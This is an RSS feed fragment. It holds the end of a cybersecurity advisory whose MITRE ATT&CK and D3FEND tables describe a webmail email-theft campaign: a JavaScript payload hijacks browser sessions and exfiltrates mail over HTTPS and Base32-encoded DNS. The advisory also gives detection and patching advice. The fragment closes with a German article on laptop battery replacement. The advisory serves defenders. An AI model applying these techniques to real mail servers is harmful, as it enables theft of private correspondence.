<div class="TableCellContent SCXW76044448 BCX8">
<div class="OutlineElement Ltr SCXW76044448 BCX8">
<p>Email Collection </p>
</div>
</div>
</td>
<td>
<div class="TableCellContent SCXW76044448 BCX8">
<div class="OutlineElement Ltr SCXW76044448 BCX8">
<p><a href="https://attack.mitre.org/versions/v19/techniques/T1114/" target="_blank"><u>T1114</u></a> </p>
</div>
</div>
</td>
<td>
<div class="TableCellContent SCXW76044448 BCX8">
<div class="OutlineElement Ltr SCXW76044448 BCX8">
<p>This group has emphasized collection of emails. </p>
</div>
</div>
</td>
</tr>
<tr>
<td>
<div class="TableCellContent SCXW76044448 BCX8">
<div class="OutlineElement Ltr SCXW76044448 BCX8">
<p>Email Collection: Remote Email Collection </p>
</div>
</div>
</td>
<td>
<div class="TableCellContent SCXW76044448 BCX8">
<div class="OutlineElement Ltr SCXW76044448 BCX8">
<p><a href="https://attack.mitre.org/versions/v19/techniques/T1114/002/" target="_blank"><u>T1114.002</u></a> </p>
</div>
</div>
</td>
<td>
<div class="TableCellContent SCXW76044448 BCX8">
<div class="OutlineElement Ltr SCXW76044448 BCX8">
<p>Emails are collected via API calls to the ZCS mail server and are not collected from emails stored directly on the victim’s device. </p>
</div>
</div>
</td>
</tr>
<tr>
<td>
<div class="TableCellContent SCXW76044448 BCX8">
<div class="OutlineElement Ltr SCXW76044448 BCX8">
<p>Automated Collection </p>
</div>
</div>
</td>
<td>
<div class="TableCellContent SCXW76044448 BCX8">
<div class="OutlineElement Ltr SCXW76044448 BCX8">
<p><a href="https://attack.mitre.org/versions/v19/techniques/T1119/" target="_blank"><u>T1119</u></a> </p>
</div>
</div>
</td>
<td>
<div class="TableCellContent SCXW76044448 BCX8">
<div class="OutlineElement Ltr SCXW76044448 BCX8">
<p>Upon execution, the JavaScript payload automatically collects all relevant information in stages. </p>
</div>
</div>
</td>
</tr>
<tr>
<td>
<div class="TableCellContent SCXW76044448 BCX8">
<div class="OutlineElement Ltr SCXW76044448 BCX8">
<p>Browser Session Hijacking </p>
</div>
</div>
</td>
<td>
<div class="TableCellContent SCXW76044448 BCX8">
<div class="OutlineElement Ltr SCXW76044448 BCX8">
<p><a href="https://attack.mitre.org/versions/v19/techniques/T1185/" target="_blank"><u>T1185</u></a> </p>
</div>
</div>
</td>
<td>
<div class="TableCellContent SCXW76044448 BCX8">
<div class="OutlineElement Ltr SCXW76044448 BCX8">
<p>The JavaScript payload leverages the user’s authenticated browser session to make API requests as the user. </p>
</div>
</div>
</td>
</tr>
<tr>
<td>
<div class="TableCellContent SCXW76044448 BCX8">
<div class="OutlineElement Ltr SCXW76044448 BCX8">
<p>Archive Collected Data </p>
</div>
</div>
</td>
<td>
<div class="TableCellContent SCXW76044448 BCX8">
<div class="OutlineElement Ltr SCXW76044448 BCX8">
<p><a href="https://attack.mitre.org/versions/v19/techniques/T1560/" target="_blank"><u>T1560</u></a> </p>
</div>
</div>
</td>
<td>
<div class="TableCellContent SCXW76044448 BCX8">
<div class="OutlineElement Ltr SCXW76044448 BCX8">
<p>Emails are exfiltrated with GZIP compression. </p>
</div>
</div>
</td>
</tr>
</tbody>
</table>
</div>
</div>
<div class="OutlineElement Ltr SCXW76044448 BCX8">
<div class="TableContainer Ltr SCXW76044448 BCX8">
<p><a class="ck-anchor"></a></p>
<table dir="ltr" class="tablesaw tablesaw-stack" data-tablesaw-mode="stack" data-tablesaw-minimap>
<caption><em><strong>Table 18: Discovery </strong></em></caption>
<thead>
<tr>
<th role="columnheader" data-tablesaw-priority="persist">
<div class="TableCellContent SCXW76044448 BCX8">
<div class="OutlineElement Ltr SCXW76044448 BCX8">
<p class="text-align-center"><strong>Technique Title</strong> </p>
</div>
</div>
</th>
<th role="columnheader">
<div class="TableCellContent SCXW76044448 BCX8">
<div class="OutlineElement Ltr SCXW76044448 BCX8">
<p class="text-align-center"><strong>ID</strong> </p>
</div>
</div>
</th>
<th role="columnheader">
<div class="TableCellContent SCXW76044448 BCX8">
<div class="OutlineElement Ltr SCXW76044448 BCX8">
<p class="text-align-center"><strong>Use</strong> </p>
</div>
</div>
</th>
</tr>
</thead>
<tbody>
<tr>
<td>
<div class="TableCellContent SCXW76044448 BCX8">
<div class="OutlineElement Ltr SCXW76044448 BCX8">
<p>Account Discovery </p>
</div>
</div>
</td>
<td>
<div class="TableCellContent SCXW76044448 BCX8">
<div class="OutlineElement Ltr SCXW76044448 BCX8">
<p><a href="https://attack.mitre.org/versions/v19/techniques/T1087/" target="_blank"><u>T1087</u></a> </p>
</div>
</div>
</td>
<td>
<div class="TableCellContent SCXW76044448 BCX8">
<div class="OutlineElement Ltr SCXW76044448 BCX8">
<p>Stolen Global Access Lists provide the group with new users to target. </p>
</div>
</div>
</td>
</tr>
</tbody>
</table>
<p><a class="ck-anchor"></a></p>
</div>
</div>
<div class="OutlineElement Ltr SCXW76044448 BCX8">
<div class="TableContainer Ltr SCXW76044448 BCX8">
<table dir="ltr" class="tablesaw tablesaw-stack" data-tablesaw-mode="stack" data-tablesaw-minimap>
<caption><em><strong>Table 19: Exfiltration </strong></em></caption>
<thead>
<tr>
<th role="columnheader" data-tablesaw-priority="persist">
<div class="TableCellContent SCXW76044448 BCX8">
<div class="OutlineElement Ltr SCXW76044448 BCX8">
<p class="text-align-center"><strong>Technique Title</strong> </p>
</div>
</div>
</th>
<th role="columnheader">
<div class="TableCellContent SCXW76044448 BCX8">
<div class="OutlineElement Ltr SCXW76044448 BCX8">
<p class="text-align-center"><strong>ID</strong> </p>
</div>
</div>
</th>
<th role="columnheader">
<div class="TableCellContent SCXW76044448 BCX8">
<div class="OutlineElement Ltr SCXW76044448 BCX8">
<p class="text-align-center"><strong>Use</strong> </p>
</div>
</div>
</th>
</tr>
</thead>
<tbody>
<tr>
<td>
<div class="TableCellContent SCXW76044448 BCX8">
<div class="OutlineElement Ltr SCXW76044448 BCX8">
<p>Exfiltration Over Alternative Protocol </p>
</div>
</div>
</td>
<td>
<div class="TableCellContent SCXW76044448 BCX8">
<div class="OutlineElement Ltr SCXW76044448 BCX8">
<p><a href="https://attack.mitre.org/versions/v19/techniques/T1048/" target="_blank"><u>T1048</u></a> </p>
</div>
</div>
</td>
<td>
<div class="TableCellContent SCXW76044448 BCX8">
<div class="OutlineElement Ltr SCXW76044448 BCX8">
<p>Victim information was exfiltrated over both HTTPS and DNS. </p>
</div>
</div>
</td>
</tr>
<tr>
<td>
<div class="TableCellContent SCXW76044448 BCX8">
<div class="OutlineElement Ltr SCXW76044448 BCX8">
<p>Exfiltration Over Alternative Protocol: Exfiltration Over Asymmetric Encrypted Non-C2 Protocol </p>
</div>
</div>
</td>
<td>
<div class="TableCellContent SCXW76044448 BCX8">
<div class="OutlineElement Ltr SCXW76044448 BCX8">
<p><a href="https://attack.mitre.org/versions/v19/techniques/T1048/002/" target="_blank"><u>T1048.002</u></a> </p>
</div>
</div>
</td>
<td>
<div class="TableCellContent SCXW76044448 BCX8">
<div class="OutlineElement Ltr SCXW76044448 BCX8">
<p>Some payloads, especially ones with large amounts of data, were exfiltrated over HTTPS. </p>
</div>
</div>
</td>
</tr>
<tr>
<td>
<div class="TableCellContent SCXW76044448 BCX8">
<div class="OutlineElement Ltr SCXW76044448 BCX8">
<p>Exfiltration Over Alternative Protocol: Exfiltration Over Unencrypted Non-C2 Protocol </p>
</div>
</div>
</td>
<td>
<div class="TableCellContent SCXW76044448 BCX8">
<div class="OutlineElement Ltr SCXW76044448 BCX8">
<p><a href="https://attack.mitre.org/versions/v19/techniques/T1048/003/" target="_blank"><u>T1048.003</u></a> </p>
</div>
</div>
</td>
<td>
<div class="TableCellContent SCXW76044448 BCX8">
<div class="OutlineElement Ltr SCXW76044448 BCX8">
<p>Some smaller bandwidth payloads were exfiltrated over DNS using Base32 encoding. </p>
</div>
</div>
</td>
</tr>
</tbody>
</table>
</div>
</div>
<h2><strong>Appendix B: MITRE D3FEND countermeasures </strong><a class="ck-anchor"></a></h2>
<p>See <a href="https://www.cisa.gov/#table20"><strong>Table 20</strong></a> for a mapping of several of the cybersecurity countermeasures mentioned in this advisory. <a class="ck-anchor"></a></p>
<div class="OutlineElement Ltr SCXW46665017 BCX8">
<div class="TableContainer Ltr SCXW46665017 BCX8">
<table dir="ltr" class="tablesaw tablesaw-stack" data-tablesaw-mode="stack" data-tablesaw-minimap>
<caption><em><strong>Table 20: MITRE D3FEND Countermeasures </strong></em></caption>
<thead>
<tr>
<th role="columnheader" data-tablesaw-priority="persist">
<div class="TableCellContent SCXW46665017 BCX8">
<div class="OutlineElement Ltr SCXW46665017 BCX8">
<p class="text-align-center"><strong>Countermeasure Title</strong> </p>
</div>
</div>
</th>
<th role="columnheader">
<div class="TableCellContent SCXW46665017 BCX8">
<div class="OutlineElement Ltr SCXW46665017 BCX8">
<p class="text-align-center"><strong>ID</strong> </p>
</div>
</div>
</th>
<th role="columnheader">
<div class="TableCellContent SCXW46665017 BCX8">
<div class="OutlineElement Ltr SCXW46665017 BCX8">
<p class="text-align-center"><strong>Description</strong> </p>
</div>
</div>
</th>
</tr>
</thead>
<tbody>
<tr>
<td>
<div class="TableCellContent SCXW46665017 BCX8">
<div class="OutlineElement Ltr SCXW46665017 BCX8">
<p>Application Hardening </p>
</div>
</div>
</td>
<td>
<div class="TableCellContent SCXW46665017 BCX8">
<div class="OutlineElement Ltr SCXW46665017 BCX8">
<p><a href="https://d3fend.mitre.org/technique/d3f:ApplicationHardening" target="_blank"><u>D3-AH</u></a> </p>
</div>
</div>
</td>
<td>
<div class="TableCellContent SCXW46665017 BCX8">
<div class="ListContainerWrapper SCXW46665017 BCX8">
<ul type="disc">
<li>Organizations should immediately prioritize patching <a href="https://www.cve.org/CVERecord?id=CVE-2025-66376" target="_blank"><u>CVE-2025-66376</u></a>.  </li>
<li>Organizations should promptly apply software updates to all email systems. </li>
</ul>
</div>
</div>
</td>
</tr>
<tr>
<td>
<div class="TableCellContent SCXW46665017 BCX8">
<div class="OutlineElement Ltr SCXW46665017 BCX8">
<p>Isolate </p>
</div>
</div>
</td>
<td>
<div class="TableCellContent SCXW46665017 BCX8">
<div class="OutlineElement Ltr SCXW46665017 BCX8">
<p><a href="https://d3fend.mitre.org/tactic/d3f:Isolate/" target="_blank"><u>d3f:Isolate</u></a> </p>
</div>
</div>
</td>
<td>
<div class="TableCellContent SCXW46665017 BCX8">
<div class="OutlineElement Ltr SCXW46665017 BCX8">
<p>Organizations that cannot feasibly patch should use alternative mail clients. </p>
</div>
</div>
</td>
</tr>
<tr>
<td>
<div class="TableCellContent SCXW46665017 BCX8">
<div class="OutlineElement Ltr SCXW46665017 BCX8">
<p>Credential Hardening </p>
</div>
</div>
</td>
<td>
<div class="TableCellContent SCXW46665017 BCX8">
<div class="OutlineElement Ltr SCXW46665017 BCX8">
<p><a href="https://d3fend.mitre.org/technique/d3f:CredentialHardening" target="_blank"><u>D3-CH</u></a> </p>
</div>
</div>
</td>
<td>
<div class="TableCellContent SCXW46665017 BCX8">
<div class="OutlineElement Ltr SCXW46665017 BCX8">
<p>Organizations should consider using a third-party authentication service that supports passkeys to mediate access to ZCS and other services that do not natively support passkeys. </p>
</div>
</div>
</td>
</tr>
<tr>
<td>
<div class="TableCellContent SCXW46665017 BCX8">
<div class="OutlineElement Ltr SCXW46665017 BCX8">
<p>Network Traffic Analysis </p>
</div>
</div>
</td>
<td>
<div class="TableCellContent SCXW46665017 BCX8">
<div class="OutlineElement Ltr SCXW46665017 BCX8">
<p><a href="https://d3fend.mitre.org/technique/d3f:NetworkTrafficAnalysis" target="_blank"><u>D3-NTA</u></a> </p>
</div>
</div>
</td>
<td>
<div class="TableCellContent SCXW46665017 BCX8">
<div class="OutlineElement Ltr SCXW46665017 BCX8">
<p>Organizations should monitor for significant amounts of outbound data being sent to IPs associated with VPS providers not used by the organization. </p>
</div>
</div>
</td>
</tr>
<tr>
<td>
<div class="TableCellContent SCXW46665017 BCX8">
<div class="OutlineElement Ltr SCXW46665017 BCX8">
<p>DNS Traffic Analysis </p>
</div>
</div>
</td>
<td>
<div class="TableCellContent SCXW46665017 BCX8">
<div class="OutlineElement Ltr SCXW46665017 BCX8">
<p><a href="https://d3fend.mitre.org/technique/d3f:DNSTrafficAnalysis" target="_blank"><u>D3-DNSTA</u></a> </p>
</div>
</div>
</td>
<td>
<div class="TableCellContent SCXW46665017 BCX8">
<div class="OutlineElement Ltr SCXW46665017 BCX8">
<p>Organizations should monitor for frequent DNS queries to a suspicious domain for seemingly random subdomains. </p>
</div>
</div>
</td>
</tr>
<tr>
<td>
<div class="TableCellContent SCXW46665017 BCX8">
<div class="OutlineElement Ltr SCXW46665017 BCX8">
<p>Network Traffic Community Deviation </p>
</div>
</div>
</td>
<td>
<div class="TableCellContent SCXW46665017 BCX8">
<div class="OutlineElement Ltr SCXW46665017 BCX8">
<p><a href="https://d3fend.mitre.org/technique/d3f:NetworkTrafficCommunityDeviation" target="_blank"><u>D3-NTCD</u></a> </p>
</div>
</div>
</td>
<td>
<div class="TableCellContent SCXW46665017 BCX8">
<div class="ListContainerWrapper SCXW46665017 BCX8">
<ul type="disc">
<li>Organizations should monitor for a sudden spike of connections to a server associated with a recently established domain. </li>
<li>Organizations should monitor for connections to internal services, such as webmail, from VPN providers. </li>
</ul>
</div>
</div>
</td>
</tr>
<tr>
<td>
<div class="TableCellContent SCXW46665017 BCX8">
<div class="OutlineElement Ltr SCXW46665017 BCX8">
<p>Identifier Activity Analysis </p>
</div>
</div>
</td>
<td>
<div class="TableCellContent SCXW46665017 BCX8">
<div class="OutlineElement Ltr SCXW46665017 BCX8">
<p><a href="https://d3fend.mitre.org/technique/d3f:IdentifierActivityAnalysis" target="_blank"><u>D3-IAA</u></a> </p>
</div>
</div>
</td>
<td>
<div class="TableCellContent SCXW46665017 BCX8">
<div class="OutlineElement Ltr SCXW46665017 BCX8">
<p>Organizations should search for the listed known IOCs. </p>
</div>
</div>
</td>
</tr>
<tr>
<td>
<div class="TableCellContent SCXW46665017 BCX8">
<div class="OutlineElement Ltr SCXW46665017 BCX8">
<p>Process Analysis </p>
</div>
</div>
</td>
<td>
<div class="TableCellContent SCXW46665017 BCX8">
<div class="OutlineElement Ltr SCXW46665017 BCX8">
<p><a href="https://d3fend.mitre.org/technique/d3f:ProcessAnalysis" target="_blank"><u>D3-PA</u></a> </p>
</div>
</div>
</td>
<td>
<div class="TableCellContent SCXW46665017 BCX8">
<div class="ListContainerWrapper SCXW46665017 BCX8">
<ul type="disc">
<li>Organizations should search ZCS log files for specific commands used by the malicious script. </li>
<li>Organizations should search the localStorage property in web browsers for the ZCS webmail client for “ZimbraWeb” Application Passcodes. </li>
</ul>
</div>
</div>
</td>
</tr>
<tr>
<td>Message Analysis</td>
<td><a href="https://d3fend.mitre.org/technique/d3f:MessageAnalysis">D3-MA</a></td>
<td>Organizations that suspect they have victims of this campaign should search for emails with a malicious payload to identify other victims.</td>
</tr>
</tbody>
</table>
</div>
</div>]]></content:encoded>
</item>
<item>
<title><![CDATA[Akku im Sinkflug – wann lohnt der Tausch, wann muss ein neues Notebook her?]]></title>
<description><![CDATA[ParinPix / Shutterstock.com



Die Steckdose wird zum ständigen Begleiter, das Ladekabel zum wichtigsten Accessoire im Rucksack: Wenn der Notebook-Akku nachlässt, wächst unweigerlich der Frust im Alltag. Die schlechte Nachricht: Der chemische Alterungsprozess von Lithium-Ionen-Zellen ist unvermei...]]></description>
<link>https://tsecurity.de/de/3694427/it-security-nachrichten/akku-im-sinkflug-wann-lohnt-der-tausch-wann-muss-ein-neues-notebook-her/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3694427/it-security-nachrichten/akku-im-sinkflug-wann-lohnt-der-tausch-wann-muss-ein-neues-notebook-her/</guid>
<pubDate>Sat, 25 Jul 2026 18:59:24 +0200</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<div>
		<div class="grid grid--cols-10@md grid--cols-8@lg article-column">
					  <div class="col-12 col-10@md col-6@lg col-start-3@lg">
						<div class="article-column__content">
<section class="wp-block-bigbite-multi-title"><div class="container"></div></section>


<div class="extendedBlock-wrapper block-coreImage undefined"><figure class="wp-block-image size-large"><img loading="lazy" src="https://b2b-contenthub.com/wp-content/uploads/2026/07/Bildschirmfoto-2026-07-19-um-21.16.38.png?w=1024" alt="Akku im Sinkflug" class="wp-image-4198584" width="1024" height="576" sizes="auto, (max-width: 1024px) 100vw, 1024px"></figure><p class="imageCredit">ParinPix / Shutterstock.com</p></div>



<p class="wp-block-paragraph">Die Steckdose wird zum ständigen Begleiter, das Ladekabel zum wichtigsten Accessoire im Rucksack: Wenn der <a href="https://www.pcwelt.de/article/3158726/akkulaufzeit-unter-windows-11-erhoehen.html" target="_blank">Notebook-Akku</a> nachlässt, wächst unweigerlich der Frust im Alltag. Die schlechte Nachricht: Der chemische Alterungsprozess von Lithium-Ionen-Zellen ist unvermeidbar. Doch ein schwacher Akku bedeutet noch nicht zwingend, dass ein älterer <a href="https://www.pcwelt.de/article/2215385/die-besten-laptops-test.html" target="_blank">Laptop</a> in den Elektroschrott gehört. Oft lässt sich der Stromspeicher problemlos austauschen und die Reparatur ist wirtschaftlich sinnvoll. Aber nicht in jedem Fall. Wir zeigen, wie Sie sich an Fakten statt am Bauchgefühl orientieren und wann es Zeit wird, sich nach neuer Hardware umzusehen.</p>



<h2 class="wp-block-heading">Diagnose: Fakten statt Bauchgefühl</h2>


<div class="extendedBlock-wrapper block-coreImage undefined"><figure class="wp-block-image size-large"><img loading="lazy" src="https://b2b-contenthub.com/wp-content/uploads/2026/07/Bildschirmfoto-2026-07-19-um-21.17.04.png?w=851" alt="Diagnose" class="wp-image-4198585" width="851" height="1024" sizes="auto, (max-width: 851px) 100vw, 851px"></figure><p class="imageCredit">Foundry</p></div>



<p class="wp-block-paragraph">Bevor Sie Schraubenzieher zücken oder neue Hardware kaufen, muss geklärt werden: Ist Ihr Akku wirklich verschlissen, oder saugt ressourcenfressende Software im Hintergrund heimlich den Stromspeicher leer? Die Frage ist schnell beantwortet, denn sowohl Windows als auch macOS bieten tiefgreifende <a href="https://www.pcwelt.de/article/3014555/laptop-windows-akkubericht.html" target="_blank">Diagnose-Tools</a>, die sich mit wenigen</p>



<p class="wp-block-paragraph"><strong>Unter Windows:</strong> Öffnen Sie die Windows-Eingabeaufforderung (CMD) oder PowerShell als Administrator und tippen Sie den Befehl</p>



<pre class="wp-block-code"><code><strong>powercfg /batteryreport</strong></code></pre>



<p class="wp-block-paragraph">ein. Windows generiert daraufhin eine detaillierte HTML-Datei, die tief ins System blicken lässt. Öffnen Sie die Datei unter dem angegebenen Pfad – z.B. „C:\battery-report.html“. Entscheidend sind hier zwei Werte: die <strong>Design Capacity</strong> (die ursprüngliche Nennkapazität Ihres Akkus ab Werk) und die <strong>Full Charge Capacity</strong> (die aktuell noch erreichbare Maximalkapazität). Liegt die aktuelle Kapazität unter <strong>80 Prozent des Ursprungswertes</strong>, gilt ein Akku allgemein als verschlissen. Spätestens wenn er die 70-Prozent-Marke unterschreitet, wird der Kapazitätsverlust im Alltag oft zu einer spürbaren Einschränkung – das Bauteil ist Ende seines Lebenszyklus angekommen.</p>



<p class="wp-block-paragraph"><strong>Bei macOS:</strong> Auf einem MacBook führt der Weg über das Apfel-Menü zu <strong>Systemeinstellungen → Allgemein → Info → Systembericht</strong>. Unter dem Reiter „Stromversorgung“ finden Sie die Anzahl der Ladezyklen sowie den Zustand. Apple garantiert in der Regel, dass ein Akku nach 1.000 vollständigen Ladezyklen noch mindestens 80 Prozent seiner ursprünglichen Kapazität halten kann. Fällt der Wert darunter, rät das System oft von selbst zum Service.</p>



<h2 class="wp-block-heading">Schrauben oder schrauben lassen?</h2>


<div class="extendedBlock-wrapper block-coreImage undefined"><figure class="wp-block-image size-large"><img loading="lazy" src="https://b2b-contenthub.com/wp-content/uploads/2026/07/Bildschirmfoto-2026-07-19-um-21.17.18.png?w=1024" alt="Reparaturanleitungen" class="wp-image-4198586" width="1024" height="684" sizes="auto, (max-width: 1024px) 100vw, 1024px"><figcaption class="wp-element-caption">Auf <a href="https://www.pcwelt.de/article/3174903/notebook-akku-tauschen-oder-neukauf-ratgeber.html#" target="_blank">iFixit</a> finden Verbraucher Reparaturanleitungen, Ersatzteile und Werkzeug für zahlreiche Notebooks, Smartphones und andere Elektronikgeräte.</figcaption></figure><p class="imageCredit">Foundry</p></div>



<p class="wp-block-paragraph">Steht der Defekt fest oder ist die Alterung bereits weit fortgeschritten, folgt oft eine logistische Herausforderung. Die Hardware-Realität von 2026 ist Verbrauchern nämlich nicht gerade entgegengekommen – zumindest beim Akku: In vielen modernen Ultrabooks, Surface-Geräten oder MacBooks sind die Akkuzellen großflächig im Gehäuse verklebt. Das macht den Tausch für Laien gefährlich, weil bei einer Beschädigung der Zellen <a href="https://www.pcwelt.de/article/2590103/akku-brennt-richtig-handeln-und-loeschen.html" target="_blank">akute Brandgefahr</a> besteht.</p>



<p class="wp-block-paragraph">Der Gang zur Fachwerkstatt ist deshalb oft alternativlos – achten Sie hierbei am besten auf zertifizierte Betriebe, die eine <strong>Garantie auf das Ersatzteil</strong> gewähren. Anders sieht es bei reparaturfreundlichen Business-Geräten wie dem <a href="https://www.pcwelt.de/article/3174903/notebook-akku-tauschen-oder-neukauf-ratgeber.html#" target="_blank">Lenovo ThinkPad T14 Gen 5</a> oder Vorreitern der Modularität wie dem <a href="https://www.pcwelt.de/article/2230834/framework-laptop-16-test.html" target="_blank">Framework Laptop 16</a> aus: Hier brauchen Sie oft nur einen passenden Schraubendreher und zehn Minuten Zeit, um den Akku selbst zu tauschen. Wie Sie Ihren Akku am Laptop oder am Smartphone selbst tauschen können, <a href="https://www.pcwelt.de/article/2666199/akkutausch-so-klappts-beim-smartphone-und-notebook.html" target="_blank">erklären wir in diesem Ratgeber</a>.</p>



<p class="wp-block-paragraph"><strong>Achtung beim Teilekauf:</strong> Sparen Sie nicht am falschen Ende. Extrem billige Nachbau-Akkus von No-Name-Händlern auf großen Marktplätzen bergen nicht nur ein <a href="https://www.pcwelt.de/article/3060569/akku-ladefehler-brandgefahr-vermeiden.html" target="_blank">Brandrisiko</a>, sondern schummeln oft auch bei der echten Kapazität. Greifen Sie <strong>unbedingt zu Originalteilen des Herstellers</strong> oder zu zertifizierten Ersatzteilen etablierter Drittanbieter (wie <a href="https://www.pcwelt.de/article/3174903/notebook-akku-tauschen-oder-neukauf-ratgeber.html#" target="_blank">iFixit</a>).</p>



<p class="wp-block-paragraph">Wenn die Diagnose zeigt, dass Ihr Akku physisch noch fit ist, dann liegt das Problem vermutlich an Software mit Selbstbedienungsmentalität. Praktisch: Windows und macOS verfügen über integrierte Stromfresser-Finder. Unter Windows navigieren Sie zu <strong>Einstellungen</strong> <strong>→ Strom und Akku → Akkunutzung</strong>. Dort listet Windows genau auf, welche Apps in den letzten Tagen am meisten Energie verbraucht haben. Auf dem Mac erfüllt die App <strong>Aktivitätsanzeige</strong> (Reiter <strong>Energie</strong>) denselben Zweck. Stoßen Sie hier auf Programme, die Sie gar nicht aktiv nutzen, sollten Sie deren Hintergrundaktivität einschränken oder die Software komplett deinstallieren.</p>



<p class="wp-block-paragraph"><strong>💡 Infobox: Das neue Recht auf Reparatur (Stand 2026)</strong></p>



<p class="wp-block-paragraph">Das<strong> Recht auf Reparatur </strong>stammt von der Europäischen Kommission und dem EU-Parlament. Ziel des Gesetzespakets ist es, die wachsenden Berge von Elektroschrott auf dem Kontinent zu reduzieren und die Kreislaufwirtschaft zu stärken. Nach der Verabschiedung der EU-Richtlinie im Jahr 2024 hatten die Mitgliedsstaaten bis 2026 Zeit, die Vorgaben <a href="https://www.pcwelt.de/article/3174903/notebook-akku-tauschen-oder-neukauf-ratgeber.html#" target="_blank">in nationales Recht umzusetzen</a> – nun greifen die Regeln schrittweise und wirken sich zunehmend auf den Reparaturalltag aus.</p>



<p class="wp-block-paragraph"><strong>Was Verbraucher davon haben:</strong></p>



<ul class="wp-block-list">
<li><strong>Reparaturpflicht:</strong> Hersteller sind nun gesetzlich verpflichtet, für gängige Elektronikgeräte (wie Smartphones und Laptops) Reparaturen anzubieten – und das auch nach Ablauf der gesetzlichen Gewährleistung.</li>



<li><strong>Zugang zu Ersatzteilen:</strong> Unabhängige Fachwerkstätten und ambitionierte Bastler erhalten leichteren Zugang zu Original-Ersatzteilen und offiziellen Reparaturanleitungen.</li>



<li><strong>Weniger Software-Sperren:</strong> Praktiken wie das sogenannte “Parts Pairing” (bei dem Ersatzteile per Software blockiert werden, wenn sie nicht von einer offiziellen Vertragswerkstatt eingebaut wurden) werden stark eingeschränkt.</li>



<li><strong>Mehr Wirtschaftlichkeit:</strong> Durch den faireren Wettbewerb sinken die Reparaturkosten, was den Tausch eines Akkus oft attraktiver macht als einen teuren Neukauf.</li>
</ul>



<h2 class="wp-block-heading">Wann lohnt sich der Tausch?</h2>



<p class="wp-block-paragraph">Um zu beurteilen, ob sich die Investition für den Austausch lohnt, hilft die bewährte <strong>50-Prozent-Regel</strong>: Übersteigen die Kosten für die Reparatur (Ersatz-Akku plus eventuelle Arbeitszeit der Werkstatt) mehr als die Hälfte des aktuellen Restwerts des Notebooks, wird die Angelegenheit unwirtschaftlich.</p>



<p class="wp-block-paragraph"><strong>Ein Rechenbeispiel:</strong> Ein vier Jahre altes Premium-Notebook, das früher mal 1.500 Euro gekostet hat, bringt auf dem Gebrauchtmarkt vielleicht noch 400 bis 500 Euro. Eine Investition von 120 Euro für einen fachgerechten Akkutausch ist dann noch durchaus sinnvoll und kann dem Gerät weitere zwei bis drei Lebensjahre verschaffen. Bei einem ohnehin leistungsschwachen 400-Euro-Plastikbomber aus dem Jahr 2021 ist eine 100-Euro-Reparatur jedoch (jenseits von Nostalgiegründen) kaum zu vertreten und gilt als unwirtschaftlich.</p>



<h2 class="wp-block-heading">Wann ein Neukauf wirklich sinnvoll ist</h2>



<p class="wp-block-paragraph">Mal ehrlich: Der Akku ist oft nur das offensichtlichste Symptom eines veralteten Systems. Wer über eine Reparatur nachdenkt, sollte objektiv prüfen, ob die restliche Hardware den heutigen Anforderungen noch gewachsen ist – oder ob man mit einem <a href="https://www.pcwelt.de/article/2215385/die-besten-laptops-test.html" target="_blank">neuen Laptop</a> besser fährt:</p>



<ul class="wp-block-list">
<li><strong>Windows 10 Support-Ende:</strong> Das offizielle Support-Ende von Windows 10 (Oktober 2025) liegt bereits hinter uns. Privatanwender in der EU haben zwar <a href="https://www.pcwelt.de/article/2941599/windows-10-gratis-sicher-nutzen-esu-registrierung-so-gehts.html" target="_blank">Glück im Unglück</a>: Wer mit einem Microsoft-Konto angemeldet ist, <a href="https://www.pcwelt.de/article/3177497/windows-10-bekommt-ein-weiteres-jahr-lang-updates.html" target="_blank">erhält die Extended Security Updates (ESU) im ersten Jahr bis Oktober 2027 kostenlos.</a> Doch spätestens im Herbst 2027 ist endgültig Schicht im Schacht. Geräte, deren Prozessoren nicht offiziell für Windows 11 zertifiziert sind (ältere CPUs vor der Intel Core 8. Generation oder AMD Ryzen 2000er-Serie), stoßen dann an ihre praktische Lebensdauergrenze. Ohne den auslaufenden ESU-Schutz sollten Sie ab diesem Zeitpunkt bei betroffenen Windows-Geräten nicht mehr in einen neuen Akku investieren.</li>



<li><strong>Speicher-Flaschenhälse:</strong> Verlöteter, nicht aufrüstbarer Arbeitsspeicher von 8 GB stößt selbst bei ausschließlicher Browser-Nutzung und Office-Anwendungen oft an seine Grenzen.</li>



<li><strong>Träge Performance:</strong> Wenn das Notebook nicht nur schnell leer ist, sondern beim Öffnen von Programmen ins Schwitzen kommt und der Lüfter permanent auf Hochtouren läuft, bringt auch der stärkste neue Akku kein flüssiges Arbeitsgefühl zurück.</li>
</ul>



<h2 class="wp-block-heading">Zeit für einen neuen Laptop?</h2>



<p class="wp-block-paragraph">Wenn kein (sinnvoller) Weg mehr am Neukauf vorbeiführt, ist das nicht immer eine schlechte Nachricht: Moderne Geräte punkten nicht nur mit deutlich mehr Ausdauer jenseits der Steckdose – sie bringen auch spürbar mehr Tempo und Sicherheit, effizientere Hardware und oft angenehm leise Kühlung in Ihren Alltag.</p>



<h2 class="wp-block-heading">Fazit und Checkliste: Akku tauschen oder Neukauf?</h2>



<p class="wp-block-paragraph">Die Entscheidung zwischen Werkstatt und Neuanschaffung ist am Ende des Tages ein Abwägen von Kosten, Nutzen und Sicherheit. Die folgende Checkliste hilft dabei, das Schicksal Ihres Notebooks zu klären:</p>



<p class="wp-block-paragraph"><strong>Der Tausch lohnt sich, wenn:</strong></p>



<ul class="wp-block-list">
<li>der Laptop noch alle Leistungsanforderungen im Alltag erfüllt.</li>



<li>Windows 11 offiziell unterstützt wird (oder macOS/Linux aktuell ist).</li>



<li>die Gesamtreparatur weniger als 50 % des Restwerts kostet.</li>



<li>das Gehäuse unbeschädigt ist und Scharniere sowie Tastatur noch zuverlässig funktionieren.</li>
</ul>



<p class="wp-block-paragraph"><strong>Ein Neukauf ist besser, wenn:</strong></p>



<ul class="wp-block-list">
<li>das Betriebssystem (z. B. Windows 10) keine Sicherheitsupdates mehr erhält.</li>



<li>das Gerät durch 8 GB RAM oder eine alte CPU ohnehin ein Flaschenhals im Alltag ist.</li>



<li>Displayschäden oder defekte Ports weitere, teure Reparaturen erfordern.</li>



<li>die Reparatur den Zeitwert des Geräts deutlich übersteigt.</li>
</ul>



<p class="wp-block-paragraph">(<a href="https://www.pcwelt.de/article/3174903/notebook-akku-tauschen-oder-neukauf-ratgeber.html" data-type="link" data-id="https://www.pcwelt.de/article/3174903/notebook-akku-tauschen-oder-neukauf-ratgeber.html" target="_blank">PC-Welt</a>)</p>
</div></div></div></div>]]></content:encoded>
</item>
